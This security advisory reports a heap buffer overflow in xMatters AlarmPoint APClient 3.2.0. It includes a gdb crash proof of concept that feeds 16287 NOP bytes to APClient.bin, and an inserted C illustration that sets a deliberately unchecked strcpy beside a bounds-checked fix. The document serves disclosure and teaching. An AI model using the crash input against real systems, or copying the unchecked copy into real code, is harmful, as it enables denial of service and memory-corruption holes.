xMatters AlarmPoint APClient 3.2.0 Heap Buffer Overflow

2011-04-29T00:00:00
ID PACKETSTORM:100950
Type packetstorm
Reporter Juan Sacco
Modified 2011-04-29T00:00:00

Description

Information  
--------------------  
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient  
Version: APClient 3.2.0 (native)  
Software : xMatters AlarmPoint  
Vendor Homepage : http://www.xmatters.com  
Vulnerability Type : Heap Buffer Overflow  
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin  
Severity : High  
Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>  
  
Description  
------------------  
The AlarmPoint Java Server consists of a collection of software  
components and software APIs designed to provide a flexible and  
powerful set of tools for integrating various applications to  
AlarmPoint.  
  
Details  
-------------------  
AlarmPoint APClient is affected by a Heap Overflow vulnerability in   
version APClient 3.2.0 (native)  
  
A heap overflow condition is a buffer overflow, where the buffer that   
can be overwritten is allocated in the heap portion of memory, generally   
meaning that the buffer was allocated using a routine such as the POSIX   
malloc() call.  
https://www.owasp.org/index.php/Heap_overflow  
  
  
Exploit as follows:  
Submit a malicious file containing the exploit  
root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$   
./APClient.bin --submit-file maliciousfile.hex  
or  
(gdb) run `python -c 'print "\x90"*16287'`  
Starting program:   
/opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c   
'print "\x90"*16287'`  
  
Program received signal SIGSEGV, Segmentation fault.  
0x0804be8a in free ()  
(gdb) i r  
eax 0xa303924 170932516  
ecx 0xbfb8 49080  
edx 0xa303924 170932516  
ebx 0x8059438 134583352  
esp 0xbfff3620 0xbfff3620  
ebp 0xbfff3638 0xbfff3638  
esi 0x8059440 134583360  
edi 0x80653f0 134632432  
eip 0x804be8a 0x804be8a <free+126>  
eflags 0x210206 [ PF IF RF ID ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
(gdb)  
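The crash above lands inside free(), which is the classic symptom of heap chunk metadata having been overwritten by an unbounded copy into a fixed-size malloc()ed buffer: the overflow itself is silent, and the allocator only notices the damage when it walks the corrupted chunk headers. The following C program is an added illustration of that pattern and of the bounds-checked form that prevents it; it is not APClient code, and the buffer size, function names and sample inputs are assumptions chosen for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not xMatters/APClient code. The advisory only shows that a
   long argument crashes APClient.bin inside free(); the buffer size and
   function names below are assumptions used to illustrate the pattern. */

#define SUBMIT_BUF_SIZE 1024   /* hypothetical fixed heap buffer size */

/* Vulnerable pattern: caller-controlled input is copied into a heap
   buffer without any length check. Input longer than SUBMIT_BUF_SIZE - 1
   bytes runs past the buffer into the neighbouring chunk's metadata; the
   corruption is usually detected only later, as a fault inside free(). */
char *copy_arg_unchecked(const char *arg)
{
    char *buf = malloc(SUBMIT_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    strcpy(buf, arg);          /* no bounds check: heap buffer overflow */
    return buf;
}

/* Length of arg if it fits in the buffer with its terminator, else -1.
   memchr is used instead of strnlen so the code is plain ISO C. */
static long bounded_len(const char *arg)
{
    const char *nul = memchr(arg, '\0', SUBMIT_BUF_SIZE);
    if (nul == NULL)           /* no terminator within the buffer size */
        return -1;
    return (long)(nul - arg);
}

/* 1 if the hardened copy would accept arg, 0 if it would reject it. */
int arg_fits(const char *arg)
{
    return bounded_len(arg) >= 0;
}

/* Hardened pattern: validate the length before allocating, reject
   oversize input, and copy exactly the validated number of bytes.
   Returns NULL (and allocates nothing) when the input is rejected. */
char *copy_arg_checked(const char *arg)
{
    long len = bounded_len(arg);
    if (len < 0)
        return NULL;
    char *buf = malloc(SUBMIT_BUF_SIZE);
    if (buf == NULL)
        return NULL;
    memcpy(buf, arg, (size_t)len);
    buf[len] = '\0';
    return buf;
}

int main(int argc, char **argv)
{
    /* Constructed default input so the program runs without arguments. */
    const char *input = argc > 1 ? argv[1] : "constructed short input";
    char *copy = copy_arg_checked(input);
    if (copy == NULL) {
        fprintf(stderr, "rejected: argument longer than %d bytes\n",
                SUBMIT_BUF_SIZE - 1);
        return 1;
    }
    printf("accepted %zu bytes\n", strlen(copy));
    free(copy);                /* chunk metadata intact, free() succeeds */
    return 0;
}
```

Run with a short argument and the checked copy is accepted and freed cleanly; run with an argument of a few thousand bytes and it is rejected before any allocation happens, which is the behaviour a fix for this class of bug should have. The unchecked function is kept only to show the defective pattern side by side; a sanitizer build (for example with AddressSanitizer) reports the overflow at the strcpy rather than at the later free().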
  
  
Solution  
-------------------  
No patch is available at this time.  
  
Credits  
-------------------  
Manually discovered by Insecurity Research Labs  
Juan Sacco - http://www.insecurityresearch.com  
  
--   
_________________________________________________  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.5 was released, stay tuned  
  